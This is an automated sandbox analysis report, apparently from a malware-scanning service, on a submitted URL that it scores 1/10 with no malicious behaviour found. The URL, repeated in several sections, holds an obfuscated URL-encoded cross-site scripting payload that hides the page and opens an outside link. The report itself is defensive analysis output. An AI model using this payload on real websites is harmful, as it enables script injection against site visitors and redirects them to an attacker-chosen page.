Malware Analysis Report

2025-01-18 02:06

Sample ID 240613-jeha5azaqf
Target https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E
Tags
score
1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
1/10

Threat Level: No (potentially) malicious behavior was detected

The file https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E was found to be: No (potentially) malicious behavior was detected.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-13 07:34

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 07:34

Reported

2024-06-13 07:37

Platform

win10v2004-20240611-en

Max time kernel

128s

Max time network

140s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E

Signatures

N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4376,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=3896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=3824,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4936 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5328,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5336,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=1308,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=5544,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.key-data.co.uk udp
US 8.8.8.8:53 www.key-data.co.uk udp
US 8.8.8.8:53 www.key-data.co.uk udp
GB 134.209.24.93:443 www.key-data.co.uk tcp
GB 134.209.24.93:443 www.key-data.co.uk tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
GB 87.248.205.0:80 tcp
US 13.107.9.158:443 business.bing.com tcp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
GB 142.250.178.10:443 ajax.googleapis.com tcp
US 13.107.9.158:443 business.bing.com tcp
US 13.107.9.158:443 business.bing.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 172.165.69.228:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 93.24.209.134.in-addr.arpa udp
US 8.8.8.8:53 31.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 158.9.107.13.in-addr.arpa udp
US 8.8.8.8:53 data-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 data-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
SE 184.31.15.35:443 bzib.nelreports.net tcp
NL 23.62.61.104:443 www.bing.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.115:443 www.bing.com tcp
US 8.8.8.8:53 228.69.165.172.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 104.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 115.61.62.23.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 20.189.173.15:443 tcp
NL 23.62.61.104:443 www.bing.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

N/A